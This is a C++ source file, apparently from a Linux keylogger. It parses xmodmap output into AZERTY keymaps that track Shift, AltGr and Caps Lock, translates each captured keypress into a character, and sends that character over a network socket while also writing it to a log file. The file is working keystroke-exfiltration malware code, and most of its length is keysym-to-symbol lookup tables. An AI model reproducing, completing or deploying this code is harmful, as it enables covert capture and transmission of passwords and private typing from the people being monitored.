#include <sstream>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <iostream>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <ext/stdio_filebuf.h>

#include "keymapTable.h"

using namespace std;

/*=============================================================*/
/*--- FUNCTION CALLED TO SEND AND SAVE THE LAST PRESSED KEY ---*/
/*=============================================================*/
int interpretAndSendKey(int socket, ofstream& logFile, string& state, int key, map<int,string>& keymap,
                                          map<int,string>& keymap_shift, map<int,string>& keymap_altgr){
    static bool shiftON = false;
    static bool altgrON = false;

    if(keymap[key]=="[Shift_L]" || keymap[key]=="[Shift_R]")
        shiftON = !shiftON;

    else if(keymap[key]=="[ISO_Level3_Shift]" || keymap[key]=="[Alt_Gr]")
        altgrON = !altgrON;

    else if(state=="press"){
        if(keymap[key]=="[Caps_Lock]")
            shiftON = !shiftON;

        else if(!shiftON){
            if(!altgrON){
                if (send(socket, keymap[key].c_str(), keymap[key].length(), 0) <= 0) {
                    cout << endl << "Sending error : return 1" << endl;
                    return 1;
                }
                logFile << keymap[key];
            }
            else if(altgrON){
                if (send(socket, keymap_altgr[key].c_str(), keymap_altgr[key].length(), 0) <= 0) {
                    cout << endl << "Sending error : return 1" << endl;
                    return 1;
                }
                logFile <<keymap_altgr[key];
            }
        }

        else if(shiftON){
            if(!altgrON){
                if (send(socket, keymap_shift[key].c_str(), keymap_shift[key].length(), 0) <= 0) {
                    cout << endl << "Sending error : return 1" << endl;
                    return 1;
                }
                logFile << keymap_shift[key];
            }
            else if(altgrON){
                if (send(socket, keymap_altgr[key].c_str(), keymap_altgr[key].length(), 0) <= 0) {
                    cout << endl << "Sending error : return 1" << endl;
                    return 1;
                }
                logFile <<keymap_altgr[key];
            }
        }
    }
    logFile.flush();
    return 0;
}




/*===================================================================*/
/*--- FUNCTION CALLED TO OBTAIN THE CONVERSION BETWEEN KEY NUMBER ---*/
/*---      AND KEY MEANING FROM THE EXTERNAL PROCESS XMODMAP      ---*/
/*===================================================================*/
void getConversionTable(FILE* from_xmodmap, map<int,string>* keymap, map<int,string>* keymap_shift, map<int,string>* keymap_altgr){
    __gnu_cxx::stdio_filebuf<char> buf(fileno(from_xmodmap), std::ios::in);
    istream stream(&buf);
    istringstream* lineStream;
    string line;
    string junk, key, value, majValue, altgrValue;

    for (int i=0; i<193; i++){
        getline(stream, line);
        //cout << line <<endl;
        lineStream = new istringstream(line);
        getline(*lineStream, junk, ' ');
        getline(*lineStream, key, ' ');

        //Quand il y a plusieurs espaces consécutifs (keycode < 100)
        while(key.empty()){
            getline(*lineStream, key, ' ');
        }

        getline(*lineStream, junk, ' ');
        getline(*lineStream, value, ' ');
        getline(*lineStream, majValue, ' ');
        getline(*lineStream, junk, ' ');
        getline(*lineStream, junk, ' ');
        getline(*lineStream, altgrValue, ' ');

        //Quand il n'y a aucun symbole associé à la majuscule, on associe le symbole initial
        if(majValue == "NoSymbol")
            majValue = value;

        if(altgrValue == "NoSymbol")
            altgrValue = value;

        (*keymap)[atoi(key.c_str())]=value;
        (*keymap_shift)[atoi(key.c_str())]=majValue;
        (*keymap_altgr)[atoi(key.c_str())]=altgrValue;

        delete lineStream;
    }
    return;
}




/*====================================================*/
/*--- FUNCTION CALLED TO SHOW THE CONVERSION TABLE ---*/
/*---          KEY NUMBER -> KEY MEANINGS          ---*/
/*====================================================*/
void showKeymaps(map<int,string>& keymap, map<int,string>& keymap_shift, map<int,string>& keymap_altgr){
    typedef map<int, string>::const_iterator MapIterator;
    for (MapIterator iter = keymap.begin(); iter != keymap.end(); iter++){
        cout << "Key: " << iter->first << " | " << iter->second << " | " << keymap_shift[iter->first] << " | ";
        cout << keymap_altgr[iter->first] <<endl;
    }
}




/*===================================================================*/
/*--- FUNCTION CALLED TO TRANSLATE THE SOME KEY MEANINGS OBTAINED ---*/
/*---             BY XMODMAP TO REAL KEYBOARD SYMBOLS             ---*/
/*===================================================================*/
void adaptKeymapTable(map<int,string>& keymap, map<int,string>& keymap_shift, map<int,string>& keymap_altgr){
    typedef map<int, string>::iterator MapIterator;
    for (MapIterator iter = keymap.begin(); iter != keymap.end(); iter++){
        if(iter->second == "space")
            iter->second = " ";
        else if(iter->second == "ampersand")
            iter->second = "&";
        else if(iter->second == "eacute")
            iter->second = "é";
        else if(iter->second == "quotedbl")
            iter->second = "\"";
        else if(iter->second == "apostrophe")
            iter->second = "'";
        else if(iter->second == "parenleft")
            iter->second = "(";
        else if(iter->second == "minus")
            iter->second = "-";
        else if(iter->second == "egrave")
            iter->second = "è";
        else if(iter->second == "underscore")
            iter->second = "_";
        else if(iter->second == "ccedilla")
            iter->second = "ç";
        else if(iter->second == "agrave")
            iter->second = "à";
        else if(iter->second == "parenright")
            iter->second = ")";
        else if(iter->second == "equal")
            iter->second = "=";
        else if(iter->second == "BackSpace")
            iter->second = "[◄]";
        else if(iter->second == "1")
            iter->second = "1";
        else if(iter->second == "2")
            iter->second = "2";
        else if(iter->second == "3")
            iter->second = "3";
        else if(iter->second == "4")
            iter->second = "4";
        else if(iter->second == "5")
            iter->second = "5";
        else if(iter->second == "6")
            iter->second = "6";
        else if(iter->second == "7")
            iter->second = "7";
        else if(iter->second == "8")
            iter->second = "8";
        else if(iter->second == "9")
            iter->second = "9";
        else if(iter->second == "0")
            iter->second = "0";
        else if(iter->second == "degree")
            iter->second = "°";
        else if(iter->second == "plus")
            iter->second = "+";
        else if(iter->second == "a")
            iter->second = "a";
        else if(iter->second == "z")
            iter->second = "z";
        else if(iter->second == "e")
            iter->second = "e";
        else if(iter->second == "r")
            iter->second = "r";
        else if(iter->second == "t")
            iter->second = "t";
        else if(iter->second == "y")
            iter->second = "y";
        else if(iter->second == "u")
            iter->second = "u";
        else if(iter->second == "i")
            iter->second = "i";
        else if(iter->second == "o")
            iter->second = "o";
        else if(iter->second == "p")
            iter->second = "p";
        else if(iter->second == "dead_circumflex")
            iter->second = "^";
        else if(iter->second == "dollar")
            iter->second = "$";
        else if(iter->second == "Return")
            iter->second = "\n[Return]";
        else if(iter->second == "q")
            iter->second = "q";
        else if(iter->second == "s")
            iter->second = "s";
        else if(iter->second == "d")
            iter->second = "d";
        else if(iter->second == "f")
            iter->second = "f";
        else if(iter->second == "g")
            iter->second = "g";
        else if(iter->second == "h")
            iter->second = "h";
        else if(iter->second == "j")
            iter->second = "j";
        else if(iter->second == "k")
            iter->second = "k";
        else if(iter->second == "l")
            iter->second = "l";
        else if(iter->second == "m")
            iter->second = "m";
        else if(iter->second == "ugrave")
            iter->second = "ù";
        else if(iter->second == "oe")
            iter->second = "oe";
        else if(iter->second == "asterisk")
            iter->second = "*";
        else if(iter->second == "w")
            iter->second = "w";
        else if(iter->second == "x")
            iter->second = "x";
        else if(iter->second == "c")
            iter->second = "c";
        else if(iter->second == "v")
            iter->second = "v";
        else if(iter->second == "b")
            iter->second = "b";
        else if(iter->second == "n")
            iter->second = "n";
        else if(iter->second == "comma")
            iter->second = ",";
        else if(iter->second == "semicolon")
            iter->second = ";";
        else if(iter->second == "colon")
            iter->second = ":";
        else if(iter->second == "exclam")
            iter->second = "!";
        else if(iter->second == "question")
            iter->second = "?";
        else if(iter->second == "period")
            iter->second = ".";
        else if(iter->second == "slash")
            iter->second = "/";
        else if(iter->second == "section")
            iter->second = "§";
        else if(iter->second == "greater")
            iter->second = ">";
        else if(iter->second == "less")
            iter->second = "<";
        else if(iter->second == " ")
            iter->second = " ";
        else if(iter->second == "KP_Enter")
            iter->second = "\n[Return]";
        else if(iter->second == "KP_Decimal")
            iter->second = ".";
        //Cas du pavé numérique : on le considère toujours activé
        else if(keymap[iter->first].c_str()[0] == 'K' &&
                keymap[iter->first].c_str()[1] == 'P' &&
                keymap[iter->first].c_str()[2] == '_')
            iter->second = "[" + keymap_shift[iter->first] + "]";
        else
            iter->second = "["+iter->second+"]";
    }


    for (MapIterator iter = keymap_shift.begin(); iter != keymap_shift.end(); iter++){
        if(iter->second == "ampersand")
            iter->second = "&";
        else if(iter->second == "eacute")
            iter->second = "é";
        else if(iter->second == "quotedbl")
            iter->second = "\"";
        else if(iter->second == "apostrophe")
            iter->second = "'";
        else if(iter->second == "parenleft")
            iter->second = "(";
        else if(iter->second == "minus")
            iter->second = "-";
        else if(iter->second == "egrave")
            iter->second = "è";
        else if(iter->second == "underscore")
            iter->second = "_";
        else if(iter->second == "ccedilla")
            iter->second = "ç";
        else if(iter->second == "agrave")
            iter->second = "à";
        else if(iter->second == "parenright")
            iter->second = ")";
        else if(iter->second == "equal")
            iter->second = "=";
        else if(iter->second == "1")
            iter->second = "1";
        else if(iter->second == "2")
            iter->second = "2";
        else if(iter->second == "3")
            iter->second = "3";
        else if(iter->second == "4")
            iter->second = "4";
        else if(iter->second == "5")
            iter->second = "5";
        else if(iter->second == "6")
            iter->second = "6";
        else if(iter->second == "7")
            iter->second = "7";
        else if(iter->second == "8")
            iter->second = "8";
        else if(iter->second == "9")
            iter->second = "9";
        else if(iter->second == "0")
            iter->second = "0";
        else if(iter->second == "degree")
            iter->second = "°";
        else if(iter->second == "plus")
            iter->second = "+";
        else if(iter->second == "BackSpace")
            iter->second = "[◄]";
        else if(iter->second == "ISO_Left_Tab")
            iter->second = "[Tab]";
        else if(iter->second == "A")
            iter->second = "A";
        else if(iter->second == "Z")
            iter->second = "Z";
        else if(iter->second == "E")
            iter->second = "E";
        else if(iter->second == "R")
            iter->second = "R";
        else if(iter->second == "T")
            iter->second = "T";
        else if(iter->second == "Y")
            iter->second = "Y";
        else if(iter->second == "U")
            iter->second = "U";
        else if(iter->second == "I")
            iter->second = "I";
        else if(iter->second == "O")
            iter->second = "O";
        else if(iter->second == "P")
            iter->second = "P";
        else if(iter->second == "dead_diaeresis")
            iter->second = "¨";
        else if(iter->second == "sterling")
            iter->second = "£";
        else if(iter->second == "Return")
            iter->second = "\n[Return]";
        else if(iter->second == "Q")
            iter->second = "Q";
        else if(iter->second == "S")
            iter->second = "S";
        else if(iter->second == "D")
            iter->second = "D";
        else if(iter->second == "F")
            iter->second = "F";
        else if(iter->second == "G")
            iter->second = "G";
        else if(iter->second == "H")
            iter->second = "H";
        else if(iter->second == "J")
            iter->second = "J";
        else if(iter->second == "K")
            iter->second = "K";
        else if(iter->second == "L")
            iter->second = "L";
        else if(iter->second == "M")
            iter->second = "M";
        else if(iter->second == "percent")
            iter->second = "%";
        else if(iter->second == "OE")
            iter->second = "OE";
        else if(iter->second == "mu")
            iter->second = "µ";
        else if(iter->second == "W")
            iter->second = "W";
        else if(iter->second == "X")
            iter->second = "X";
        else if(iter->second == "C")
            iter->second = "C";
        else if(iter->second == "V")
            iter->second = "V";
        else if(iter->second == "B")
            iter->second = "B";
        else if(iter->second == "N")
            iter->second = "N";
        else if(iter->second == "question")
            iter->second = "?";
        else if(iter->second == "period")
            iter->second = ".";
        else if(iter->second == "slash")
            iter->second = "/";
        else if(iter->second == "section")
            iter->second = "§";
        else if(iter->second == "space")
            iter->second = " ";
        else if(iter->second == "greater")
            iter->second = ">";
        else if(iter->second == "less")
            iter->second = "<";
        else if(iter->second == "KP_Enter")
            iter->second = "\n[Return]";
        else if(iter->second == "comma")
            iter->second = ",";
        else if(iter->second == "semicolon")
            iter->second = ";";
        else if(iter->second == "colon")
            iter->second = ":";
        else if(iter->second == "exclam")
            iter->second = "!";
        else if(iter->second == " ")
            iter->second = " ";
        else if(iter->second == "ugrave")
            iter->second = "ù";
        else if(iter->second == "dead_circumflex")
            iter->second = "^";
        else if(iter->second == "dollar")
            iter->second = "$";
        else if(iter->second == "asterisk")
            iter->second = "*";
        else
            iter->second = "["+iter->second+"]";
    }


    for (MapIterator iter = keymap_altgr.begin(); iter != keymap_altgr.end(); iter++){
        if(iter->second == "ampersand")
            iter->second = "&";
        else if(iter->second == "BackSpace")
            iter->second = "[◄]";
        else if(iter->second == "eacute")
            iter->second = "é";
        else if(iter->second == "quotedbl")
            iter->second = "\"";
        else if(iter->second == "apostrophe")
            iter->second = "'";
        else if(iter->second == "parenleft")
            iter->second = "(";
        else if(iter->second == "parenright")
            iter->second = ")";
        else if(iter->second == "minus")
            iter->second = "-";
        else if(iter->second == "egrave")
            iter->second = "è";
        else if(iter->second == "underscore")
            iter->second = "_";
        else if(iter->second == "ccedilla")
            iter->second = "ç";
        else if(iter->second == "agrave")
            iter->second = "à";
        else if(iter->second == "parenright")
            iter->second = ")";
        else if(iter->second == "equal")
            iter->second = "=";
        else if(iter->second == "1")
            iter->second = "1";
        else if(iter->second == "2")
            iter->second = "2";
        else if(iter->second == "3")
            iter->second = "3";
        else if(iter->second == "4")
            iter->second = "4";
        else if(iter->second == "5")
            iter->second = "5";
        else if(iter->second == "6")
            iter->second = "6";
        else if(iter->second == "7")
            iter->second = "7";
        else if(iter->second == "8")
            iter->second = "8";
        else if(iter->second == "9")
            iter->second = "9";
        else if(iter->second == "0")
            iter->second = "0";
        else if(iter->second == "question")
            iter->second = "?";
        else if(iter->second == "period")
            iter->second = ".";
        else if(iter->second == "slash")
            iter->second = "/";
        else if(iter->second == "section")
            iter->second = "§";
        else if(iter->second == "space")
            iter->second = " ";
        else if(iter->second == "greater")
            iter->second = ">";
        else if(iter->second == "less")
            iter->second = "<";
        else if(iter->second == "comma")
            iter->second = ",";
        else if(iter->second == "semicolon")
            iter->second = ";";
        else if(iter->second == "colon")
            iter->second = ":";
        else if(iter->second == "exclam")
            iter->second = "!";
        else if(iter->second == " ")
            iter->second = " ";
        else if(iter->second == "ugrave")
            iter->second = "ù";
        else if(iter->second == "dead_circumflex")
            iter->second = "^";
        else if(iter->second == "dollar")
            iter->second = "$";
        else if(iter->second == "asterisk")
            iter->second = "*";
        else if(iter->second == "percent")
            iter->second = "%";
        else if(iter->second == "dead_diaeresis")
            iter->second = "¨";
        else if(iter->second == "sterling")
            iter->second = "£";
        else if(iter->second == "Return")
            iter->second = "\n[Return]";
        else if(iter->second == "dead_acute")
            iter->second = "´";
        else if(iter->second == "asciitilde")
            iter->second = "~";
        else if(iter->second == "numbersign")
            iter->second = "#";
        else if(iter->second == "braceleft")
            iter->second = "{";
        else if(iter->second == "bracketleft")
            iter->second = "[";
        else if(iter->second == "bar")
            iter->second = "|";
        else if(iter->second == "dead_grave")
            iter->second = "`";
        else if(iter->second == "backslash")
            iter->second = "\\";
        else if(iter->second == "asciicircum")
            iter->second = "^";
        else if(iter->second == "at")
            iter->second = "@";
        else if(iter->second == "bracketright")
            iter->second = "]";
        else if(iter->second == "braceright")
            iter->second = "}";
        else if(iter->second == "acircumflex")
            iter->second = "â";
        else if(iter->second == "aring")
            iter->second = "å";
        else if(iter->second == "EuroSign")
            iter->second = "€";
        else if(iter->second == "ccedilla")
            iter->second = "ç";
        else if(iter->second == "thorn")
            iter->second = "þ";
        else if(iter->second == "yacute")
            iter->second = "ý";
        else if(iter->second == "ucircumflex")
            iter->second = "û";
        else if(iter->second == "icircumflex")
            iter->second = "î";
        else if(iter->second == "ocircumflex")
            iter->second = "ô";
        else if(iter->second == "paragraph")
            iter->second = "¶";
        else if(iter->second == "dead_tilde")
            iter->second = "~";
        else if(iter->second == "ecircumflex")
            iter->second = "ê";
        else if(iter->second == "Acircumflex")
            iter->second = "Â";
        else if(iter->second == "oslash")
            iter->second = "ø";
        else if(iter->second == "Ecircumflex")
            iter->second = "Ê";
        else if(iter->second == "plusminus")
            iter->second = "±";
        else if(iter->second == "ae")
            iter->second = "æ";
        else if(iter->second == "eth")
            iter->second = "ð";
        else if(iter->second == "Ucircumflex")
            iter->second = "Û";
        else if(iter->second == "Icircumflex")
            iter->second = "Î";
        else if(iter->second == "Ocircumflex")
            iter->second = "Ô";
        else if(iter->second == "onesuperior")
            iter->second = "¹";
        else if(iter->second == "twosuperior")
            iter->second = "²";
        else if(iter->second == "threesuperior")
            iter->second = "³";
        else if(iter->second == "guillemotleft")
            iter->second = "«";
        else if(iter->second == "guillemotright")
            iter->second = "»";
        else if(iter->second == "copyright")
            iter->second = "©";
        else if(iter->second == "registered")
            iter->second = "®";
        else if(iter->second == "ssharp")
            iter->second = "ß";
        else if(iter->second == "notsign")
            iter->second = "¬";
        else if(iter->second == "questiondown")
            iter->second = "¿";
        else if(iter->second == "multiply")
            iter->second = "×";
        else if(iter->second == "division")
            iter->second = "÷";
        else if(iter->second == "exclamdown")
            iter->second = "¡";
        else if(iter->second == "nobreakspace")
            iter->second = " ";
        else if(iter->second == "U2196")
            iter->second = "[KP_7]";
        else if(iter->second == "U2191")
            iter->second = "[KP_8]";
        else if(iter->second == "U2197")
            iter->second = "[KP_9]";
        else if(iter->second == "U2190")
            iter->second = "[KP_4]";
        else if(iter->second == "U2194")
            iter->second = "[KP_5]";
        else if(iter->second == "U2192")
            iter->second = "[KP_6]";
        else if(iter->second == "U2199")
            iter->second = "[KP_1]";
        else if(iter->second == "U2193")
            iter->second = "[KP_2]";
        else if(iter->second == "U2198")
            iter->second = "[KP_3]";
        else if(iter->second == "U2195")
            iter->second = "[KP_0]";
        else if(iter->second == "KP_Enter")
            iter->second = "\n[Return]";
        else if(iter->second == "KP_Decimal")
            iter->second = ".";
        else
            iter->second = "["+iter->second+"]";
    }

}

